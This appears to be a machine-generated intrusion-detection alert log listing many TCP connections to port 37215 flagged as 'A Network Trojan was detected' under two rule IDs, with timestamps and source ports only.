                Timestamp:05/29/24-15:16:20.831144
                SID:2829579
                Source Port:49340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928857
                SID:2835222
                Source Port:60326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278784
                SID:2829579
                Source Port:54090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675052
                SID:2829579
                Source Port:60900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558008
                SID:2835222
                Source Port:48224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800905
                SID:2835222
                Source Port:38172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265601
                SID:2835222
                Source Port:33126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.863265
                SID:2829579
                Source Port:60054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816372
                SID:2835222
                Source Port:36318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321734
                SID:2829579
                Source Port:56280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836552
                SID:2835222
                Source Port:58186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139961
                SID:2829579
                Source Port:52028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584024
                SID:2835222
                Source Port:41636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712597
                SID:2835222
                Source Port:34096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141078
                SID:2829579
                Source Port:51508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385816
                SID:2829579
                Source Port:60234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.021654
                SID:2829579
                Source Port:57258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.100801
                SID:2829579
                Source Port:45678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331592
                SID:2829579
                Source Port:41594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980027
                SID:2835222
                Source Port:39738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521068
                SID:2835222
                Source Port:47208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863025
                SID:2835222
                Source Port:43682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652355
                SID:2835222
                Source Port:44882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281626
                SID:2829579
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502877
                SID:2829579
                Source Port:54816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573187
                SID:2829579
                Source Port:49348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275346
                SID:2835222
                Source Port:46386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215350
                SID:2829579
                Source Port:54086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239026
                SID:2835222
                Source Port:44694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418916
                SID:2835222
                Source Port:56280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948498
                SID:2835222
                Source Port:50112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161280
                SID:2835222
                Source Port:49524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965369
                SID:2829579
                Source Port:59582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074874
                SID:2829579
                Source Port:35170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166479
                SID:2835222
                Source Port:48436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977680
                SID:2829579
                Source Port:35408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785592
                SID:2835222
                Source Port:53652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225312
                SID:2835222
                Source Port:44748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840838
                SID:2835222
                Source Port:38946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986026
                SID:2835222
                Source Port:55464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689552
                SID:2829579
                Source Port:39432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438130
                SID:2835222
                Source Port:56250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333623
                SID:2829579
                Source Port:53124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965393
                SID:2835222
                Source Port:43980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225564
                SID:2835222
                Source Port:36706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844753
                SID:2835222
                Source Port:57578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.616661
                SID:2835222
                Source Port:58140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543568
                SID:2835222
                Source Port:48472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660832
                SID:2835222
                Source Port:50768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964596
                SID:2829579
                Source Port:39236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418591
                SID:2835222
                Source Port:43228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531274
                SID:2829579
                Source Port:48696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466017
                SID:2835222
                Source Port:51216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816071
                SID:2835222
                Source Port:39550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.031514
                SID:2835222
                Source Port:54124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669351
                SID:2835222
                Source Port:53940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231057
                SID:2835222
                Source Port:44394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503457
                SID:2829579
                Source Port:60982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278798
                SID:2835222
                Source Port:52662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521782
                SID:2829579
                Source Port:54728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586826
                SID:2835222
                Source Port:56906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.796787
                SID:2835222
                Source Port:43520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321750
                SID:2835222
                Source Port:43314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328339
                SID:2835222
                Source Port:56298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726117
                SID:2835222
                Source Port:43508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583531
                SID:2835222
                Source Port:57920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263196
                SID:2835222
                Source Port:36196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518252
                SID:2829579
                Source Port:45636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128015
                SID:2829579
                Source Port:40464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984524
                SID:2835222
                Source Port:54884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795772
                SID:2835222
                Source Port:41766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785391
                SID:2829579
                Source Port:42814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901374
                SID:2835222
                Source Port:44882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269453
                SID:2829579
                Source Port:37690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361487
                SID:2829579
                Source Port:50742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868321
                SID:2829579
                Source Port:41822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784676
                SID:2829579
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628396
                SID:2829579
                Source Port:43944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967286
                SID:2829579
                Source Port:32828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528422
                SID:2829579
                Source Port:45414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868056
                SID:2829579
                Source Port:41702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421947
                SID:2835222
                Source Port:39864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732467
                SID:2835222
                Source Port:48486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.926037
                SID:2835222
                Source Port:48580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721778
                SID:2835222
                Source Port:44424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786139
                SID:2829579
                Source Port:45134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925966
                SID:2829579
                Source Port:43550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091154
                SID:2829579
                Source Port:36262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035282
                SID:2835222
                Source Port:39836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896501
                SID:2829579
                Source Port:59646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955469
                SID:2829579
                Source Port:60922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475211
                SID:2829579
                Source Port:56882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281494
                SID:2829579
                Source Port:58358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873392
                SID:2835222
                Source Port:41476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981031
                SID:2835222
                Source Port:42128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630533
                SID:2835222
                Source Port:60750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555110
                SID:2829579
                Source Port:50336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361707
                SID:2829579
                Source Port:58138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223812
                SID:2829579
                Source Port:37374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765504
                SID:2835222
                Source Port:57804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520665
                SID:2835222
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845277
                SID:2835222
                Source Port:50636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902924
                SID:2835222
                Source Port:35798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218266
                SID:2835222
                Source Port:46290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811973
                SID:2835222
                Source Port:37052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076634
                SID:2829579
                Source Port:41266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534688
                SID:2829579
                Source Port:44638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961929
                SID:2829579
                Source Port:55208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.606273
                SID:2835222
                Source Port:52814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571645
                SID:2835222
                Source Port:40578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.613063
                SID:2835222
                Source Port:54142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814454
                SID:2835222
                Source Port:58988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559060
                SID:2829579
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515448
                SID:2835222
                Source Port:36602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025220
                SID:2835222
                Source Port:54882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339139
                SID:2829579
                Source Port:52406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222458
                SID:2829579
                Source Port:45778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472335
                SID:2835222
                Source Port:50618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065372
                SID:2829579
                Source Port:53876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.627019
                SID:2835222
                Source Port:42446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731572
                SID:2835222
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014399
                SID:2829579
                Source Port:58742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521689
                SID:2835222
                Source Port:60886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804235
                SID:2829579
                Source Port:32852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814500
                SID:2829579
                Source Port:37966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037553
                SID:2835222
                Source Port:51704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980013
                SID:2835222
                Source Port:40252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936242
                SID:2829579
                Source Port:40298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968164
                SID:2829579
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652612
                SID:2829579
                Source Port:59400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331769
                SID:2835222
                Source Port:52692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782896
                SID:2829579
                Source Port:39448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555706
                SID:2835222
                Source Port:60508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574877
                SID:2835222
                Source Port:35242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.439208
                SID:2835222
                Source Port:35110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865430
                SID:2835222
                Source Port:49840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965736
                SID:2829579
                Source Port:49350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.220833
                SID:2835222
                Source Port:38582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884036
                SID:2835222
                Source Port:59296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668466
                SID:2829579
                Source Port:56320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871658
                SID:2829579
                Source Port:49422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.798275
                SID:2835222
                Source Port:35536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717085
                SID:2835222
                Source Port:34364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212103
                SID:2835222
                Source Port:56142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.568300
                SID:2835222
                Source Port:34716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914355
                SID:2829579
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981231
                SID:2835222
                Source Port:34192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644820
                SID:2829579
                Source Port:50384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841062
                SID:2829579
                Source Port:37688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914030
                SID:2829579
                Source Port:37194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684750
                SID:2835222
                Source Port:48220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731934
                SID:2835222
                Source Port:47770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655802
                SID:2829579
                Source Port:53552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872950
                SID:2835222
                Source Port:38928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610940
                SID:2829579
                Source Port:34216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764214
                SID:2829579
                Source Port:59918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171697
                SID:2829579
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964221
                SID:2829579
                Source Port:38626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896188
                SID:2835222
                Source Port:37440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962710
                SID:2829579
                Source Port:41014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414220
                SID:2835222
                Source Port:43178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799369
                SID:2835222
                Source Port:59856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419400
                SID:2829579
                Source Port:40828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074536
                SID:2835222
                Source Port:44458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100612
                SID:2829579
                Source Port:56730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.232526
                SID:2829579
                Source Port:47380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653643
                SID:2829579
                Source Port:58918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659784
                SID:2829579
                Source Port:49306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965348
                SID:2835222
                Source Port:50732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882883
                SID:2835222
                Source Port:34364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522068
                SID:2835222
                Source Port:59160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224733
                SID:2835222
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928231
                SID:2829579
                Source Port:48746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985436
                SID:2829579
                Source Port:38028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076277
                SID:2835222
                Source Port:39558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840446
                SID:2835222
                Source Port:32896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166250
                SID:2835222
                Source Port:36248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872999
                SID:2829579
                Source Port:57524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437359
                SID:2829579
                Source Port:42038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711774
                SID:2829579
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721910
                SID:2829579
                Source Port:37902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084428
                SID:2835222
                Source Port:41076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926605
                SID:2829579
                Source Port:49884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075029
                SID:2835222
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.545272
                SID:2835222
                Source Port:45720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074598
                SID:2835222
                Source Port:36048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266621
                SID:2829579
                Source Port:56454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359511
                SID:2829579
                Source Port:45426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791523
                SID:2829579
                Source Port:49778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223463
                SID:2835222
                Source Port:59410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557612
                SID:2829579
                Source Port:40952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918311
                SID:2829579
                Source Port:48808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.718107
                SID:2829579
                Source Port:36316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929714
                SID:2829579
                Source Port:33322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240067
                SID:2835222
                Source Port:51850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900723
                SID:2835222
                Source Port:41174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042759
                SID:2829579
                Source Port:52300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239509
